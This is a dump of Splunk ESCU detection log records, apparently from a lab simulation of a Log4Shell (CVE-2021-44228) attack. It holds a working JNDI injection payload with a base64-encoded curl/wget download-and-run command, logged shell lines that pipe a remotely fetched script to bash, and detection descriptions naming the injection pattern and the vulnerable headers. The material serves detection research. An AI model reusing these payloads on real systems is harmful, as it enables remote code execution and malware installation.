CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641251, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641251, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with 